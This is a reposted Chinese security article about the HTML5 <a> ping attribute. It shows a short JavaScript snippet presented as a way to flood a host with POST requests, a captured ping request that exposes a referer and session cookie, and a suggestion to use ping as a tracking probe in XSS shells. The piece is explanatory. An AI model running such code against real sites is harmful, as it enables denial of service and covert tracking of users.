前言

上一個月的一則新聞引起了注意說利用a標簽ping屬性進行DDOS攻擊，原來還可以這樣玩。今日早讀文章由@freebuf授權分享。

@FreeBuf，目前國內最知名，用戶活躍度最高的安全網站

正文從這開始～～

在HTML5中 標簽加入了一個新的屬性ping。設計者加入它的理由是， Ping可以使瀏覽器對外發送一個異步請求，通常用來廣告的追蹤、點擊率統計或完成一次HTTP重定向。

但是聽到監視、追蹤這個詞，你是不是也覺得有點不舒服，所以Ping這個屬性真的是很不受歡迎。瀏覽器一度抵制、進而加入默認關閉必須從如config這樣的選項中打開才可以使用，到現在我從caniuse.com上還沒有追尋到哪個瀏覽器支持它，但在我測試中最新版Chrome44是默認支持Ping的。

一、Ping的用法

Ping的用法很簡單，這里舉一個例子。

href="http://www.xisigr.com" ping="http://www.xisigr.com/track">click me

當你點擊click me的時候，會異步發送一個POST請求到Ping后面指定的地址，Request Body的內容為PING。有人可能會說，那click me這段代碼行不行？答案是否定的，href這個屬性必須存在與中，不然Ping也是不會運行的。

二、死亡之PING

根據Ping發送POST請求這個特性，我們可以使用循環使之不停的向一個地址追加POST請求，造成DOS攻擊。

var link = document.createElement('a');
link.href="";
link.ping = 'http://www.xisigr.com/';
document.head.appendChild(link); link.click();

運行上面的代碼，就會不停的向xisigr.com發送POST請求。

三、隱私追蹤

Ping可以進行廣告追蹤，它可以統計用戶都點擊了哪些鏈接以及次數，并使用POST請求把這些信息發送到廣告商的服務器上。那么POST的這些信息都包含了什么呢，簡單來說HTTP Header的內容都會有，我們來看一個截獲的完整信息

HOST: xisigr.com
CONTENT-LENGTH: 4
ORIGIN: http://mail.163.com
PING-FROM: http://****.com/js6/read/readhtml.jsp?mid=458:xtbBygBMgFO+dvBcvQAAsM&font=15&color=064977
USER-AGENT: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36
PING-TO: http://www.baidu.com/
CONTENT-TYPE: text/ping
ACCEPT: */*
REFERER: http://****.com/js6/read/readhtml.jsp?mid=458:xtbBygBMgFO+dvBcvQAAsM&font=15&color=064977
ACCEPT-ENCODING: gzip, deflate
ACCEPT-LANGUAGE: zh-CN,zh;q=0.8
COOKIE: sessionid=rnbymrrkbkipn7byvdc2hsem5o0vrr13
CACHE-CONTROL: max-age=0
CONNECTION: keep-alive

PING-FROM、USER-AGENT、REFERER這三個關鍵信息，直接泄漏了用戶的隱私。而這也為我們最愛的XSSSHELL又提供了一個小插件。對于圖片探針如果沒了新鮮感，那么請試試Ping探針吧，簡單的一句就搞定！

追蹤這事是攻擊者的最愛，我簡單做了一個DEMO，打開aping.html這個頁面，點擊后，你會前往wathwg，并且我異步重定向了下w3.org，但同時你的HTTP Header/IP就被我獲取到了。你可以通過這個鏈接查看截獲到的信息，Ping.html。

四、總結

把PING歸結為探測用戶隱私的范疇一點也不為過。這其實不怪設計者，Ping的最初設計理念，是為了使得廣告統計更加方便簡潔，哪怕是它的重定向功能，也是為了在異步請求的情況下使用戶整體提高訪問頁面速度的快感。但是這仿佛也無法遮掩住PING的潛在探測用戶隱私的特性。也許這就是PING的先天性缺陷。

PS:

HTML5中，標簽多了幾個屬性，如download/ping。2012年時，我在百度HI寫了一篇《HTML5 A[download] 攻擊模型》，就對當時download的攻擊思路做了簡單的分析，可惜百度HI關閉了，download那篇也石沉大海，但三年下來，再看那篇文章，當時提出的一些攻擊點，瀏覽器也已經做了相應的防御，從中看到了攻防對抗的變化和瀏覽器廠商的激進與妥協。

這種感悟是挺好的，你可以對應著如筆記般的進行標注，這些變化是什么、為什么這么變等等，我覺得應該時不時的把前些年的文章拿出來，和現在的形式對比下，有些東西不得不從這種長時間軸的總結和更新中才能得出結論來，比如10年間消失的10種WEB攻擊、瀏覽器廠商的激進與妥協、10年后WEB是什么樣的……

關于本文
作者：@xisigr
原文：https://www.freebuf.com/articles/network/74173.html

為你推薦

【第1278期】上課啦！了解下 DDoS攻擊方式

【第849期】如何讓前端更安全？——XSS攻擊和防御詳解

總結

以上是生活随笔為你收集整理的可以ping通但远程桌面不行_【第1624期】HTML5：lt;agt;的ping属性之死亡ping与隐私追踪...的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。